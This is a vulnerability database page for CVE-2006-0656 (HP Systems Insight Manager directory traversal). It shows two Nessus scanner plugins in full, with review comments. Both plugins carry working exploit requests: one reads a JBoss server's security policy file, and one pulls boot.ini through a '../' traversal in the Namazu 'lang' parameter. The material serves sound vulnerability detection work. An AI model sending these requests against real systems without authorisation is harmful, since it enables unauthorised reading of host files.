Vulnerabilities > CVE-2006-0656 - Directory Traversal vulnerability in HP Systems Insight Manager 4.2/5.0
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: NONE
Availability impact: NONE
Summary
Directory traversal vulnerability in HP Systems Insight Manager 4.2 through 5.0 SP3 for Windows allows remote attackers to access arbitrary files via unspecified vectors, a different vulnerability than CVE-2005-2006.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 7 |
Nessus
NASL family CGI abuses
NASL id JBOSS_CONFIG_DISCLOSURE.NASL
description The remote JBoss server is vulnerable to an information disclosure flaw that could allow an attacker to retrieve the physical path of the server installation, its security policy, or to guess its exact version number. An attacker may use this flaw to gain more information about the remote configuration.
last seen 2020-06-01
modified 2020-06-02
plugin id 18526
published 2005-06-18
reporter This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
source https://www.tenable.com/plugins/nessus/18526
title JBoss org.jboss.web.WebServer Class Multiple Vulnerabilities (Source Disc, ID)
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration pass: when `description` is set the script only declares its
# metadata (ids, references, CVSS vectors, dependencies, ports) and exits
# before any request is sent.
if(description)
{
  script_id(18526);
  # NOTE(review): both CVE ids are attached to this JBoss check, while the CVE
  # summary on this page describes CVE-2006-0656 as an HP Systems Insight
  # Manager issue that is "a different vulnerability than CVE-2005-2006".
  # A hit from this plugin therefore does not by itself tell which of the two
  # advisories applies to the host; confirm the product before triaging.
  script_cve_id("CVE-2005-2006", "CVE-2006-0656");
  script_bugtraq_id(13985, 16571);
  script_version("1.21");

  script_name(english:"JBoss org.jboss.web.WebServer Class Multiple Vulnerabilities (Source Disc, ID)");

  script_set_attribute(attribute:"synopsis", value: "The remote web server is affected by an information disclosure flaw." );
  script_set_attribute(attribute:"description", value: "The remote JBoss server is vulnerable to an information disclosure flaw that could allow an attacker to retrieve the physical path of the server installation, its security policy, or to guess its exact version number. An attacker may use this flaw to gain more information about the remote configuration." );
  script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=111911095424496&w=2" );
  script_set_attribute(attribute:"see_also", value:"http://www.securityfocus.com/advisories/10104" );
  # Remediation as stated by the plugin: upgrade, or disable class download
  # through 'DownloadServerClasses' in jboss-service.xml and restart.
  script_set_attribute(attribute:"solution", value: "Upgrade to JBoss 3.2.8 or 4.0.3. Or edit JBoss' 'jboss-service.xml' configuration file, set 'DownloadServerClasses' to 'false', and restart the server." );
  # CVSS v2 base vector: network reachable, low complexity, no authentication,
  # partial confidentiality impact, no integrity or availability impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"RedHat JBoss File Disclosure");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/06/18");
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/06/17");
  script_cvs_date("Date: 2018/11/15 20:50:17");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:jboss:jboss");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  summary["english"] = "Attempts to read security policy of a remote JBoss server";
  script_summary(english:summary["english"]);
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
  script_family(english: "CGI abuses");
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 8083, 50013);
  exit(0);
}

# Check starts here

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Candidate ports: every web service already recorded in the knowledge base,
# plus 8083 and 50013, which are always added to the list.
ports = get_kb_list("Services/www");
ports = add_port_in_list(list:ports, port:8083);
ports = add_port_in_list(list:ports, port:50013);

foreach port (ports)
{
  if (get_port_state(port))
  {
    # Stage 1: request "%." and inspect the status line (r[0]). The pattern
    # matches a 400 response whose text after the status code starts with "/"
    # or with a drive letter followed by ":\", i.e. the error text appears to
    # begin with a filesystem path (the path disclosure named in the plugin
    # description).
    r = http_send_recv3(port:port, method: 'GET', item: "%.");
    if (! isnull(r) && ereg(pattern:"^HTTP/.* 400 (/|[A-Za-z]:\\)", string:r[0]))
    {
      # Stage 2: only for servers that passed stage 1, request the security
      # policy file and confirm by the "JBoss Security Policy" marker in the
      # response body (r[2]).
      file = "server.policy";
      r = http_send_recv3(method: 'GET', item:"%"+file, port:port);
      if (!isnull(r) && "JBoss Security Policy" >< r[2])
      {
        # The whole response body is embedded in the finding, so the scan
        # report itself then contains the retrieved policy text and should be
        # handled as sensitive output.
        report = string(
          "Here are the contents of the file '", file, "' that\n",
          "Nessus was able to read from the remote host :\n",
          "\n",
          r[2]
        );
        security_warning(port:port, extra:report);
      }
    }
  }
}
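NASL family CGI abuses
NASL id HPSIM_NAMAZU_LANG_DIR_TRAVERSAL.NASL
description The remote host appears to be running HP Systems Insight Manager (SIM), a unified infrastructure management tool. The version of HP SIM on the remote host includes a version of the search engine Namazu that reportedly fails to validate user input to the 'lang' parameter of the 'namazucgi' script. An unauthenticated attacker may be able to exploit this issue to access files on the remote host via directory traversal.
last seen 2020-06-01
modified 2020-06-02
plugin id 20893
published 2006-02-13
reporter This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
source https://www.tenable.com/plugins/nessus/20893
title HP Systems Insight Manager Namazu lang Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration pass: when `description` is set the script only declares its
# metadata (ids, references, CVSS vectors, dependencies, ports) and exits
# before any request is sent.
if (description)
{
  script_id(20893);
  script_version("1.22");

  script_cve_id("CVE-2006-0656");
  script_bugtraq_id(16571);

  script_name(english:"HP Systems Insight Manager Namazu lang Parameter Traversal Arbitrary File Access");
  script_summary(english:"Checks for Namazu lang parameter directory traversal vulnerability in HP Systems Insight Manager");

  script_set_attribute(attribute:"synopsis", value: "The remote web server contains a CGI script that is affected by a directory traversal flaw." );
  script_set_attribute(attribute:"description", value: "The remote host appears to be running HP Systems Insight Manager (SIM), a unified infrastructure management tool. The version of HP SIM on the remote host includes a version of the search engine Namazu that reportedly fails to validate user input to the 'lang' parameter of the 'namazucgi' script. An unauthenticated attacker may be able to exploit this issue to access files on the remote host via directory traversal." );
  script_set_attribute(attribute:"see_also", value:"http://www.securityfocus.com/advisories/10104" );
  # Remediation as stated by the plugin: a configuration change to .namazurc
  # described in the vendor advisory.
  script_set_attribute(attribute:"solution", value: "Update HP SIM's .namazurc configuration file according to the vendor advisory." );
  # CVSS v2 base vector: network reachable, low complexity, no authentication,
  # partial confidentiality impact, no integrity or availability impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2006/02/13");
  script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/09");
  script_set_attribute(attribute:"patch_publication_date", value: "2006/02/07");
  script_cvs_date("Date: 2018/06/13 18:56:27");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:systems_insight_manager");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # Registered as ACT_ATTACK, unlike the ACT_GATHER_INFO JBoss check listed
  # above it on this page.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
  script_dependencies("http_version.nasl", "web_traversal.nasl");
  script_require_ports("Services/www", 50000, 50001);
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:50000);
# Skip hosts already flagged under the generic traversal knowledge-base key,
# so a server-wide traversal is not reported a second time as this issue.
if ( get_kb_item(strcat("www/", port, "/generic_traversal"))) exit(0);

# Try to exploit the flaw to read a file.
file = "/../../../../../../../../../../../../../boot.ini";
url = string(
  "/mxhelp/cgi-bin/namazucgi?",
  "lang=", file
);
r = http_send_recv3(method: "GET", port:port, item: url);
if (isnull(r)) exit(0);
res = r[2];

# The "[boot loader]" marker in the response body is the only confirmation
# used, so this check can only fire on hosts that serve a boot.ini (the CVE
# summary on this page scopes the issue to HP SIM for Windows).
if ("[boot loader]">< res)
{
  # Keep the part of the body that precedes the "<h2>Results:" heading.
  contents = res - strstr(res, "<h2>Results:");
  if (isnull(contents))
  {
    # The listing assigned `report = desc` here, but `desc` is never defined
    # in this script. Raise the finding without an excerpt instead of reading
    # an undefined variable.
    security_warning(port:port);
  }
  else
  {
    # The retrieved file text is embedded in the finding, so the scan report
    # itself then contains host file contents and should be handled as
    # sensitive output.
    report = string(
      "Here are the contents of the file '\\boot.ini' that\n",
      "Nessus was able to read from the remote host \n",
      " by reading ", build_url(port: port, qs: url), " : \n",
      "\n",
      contents
    );
    security_warning(port:port, extra:report);
  }
}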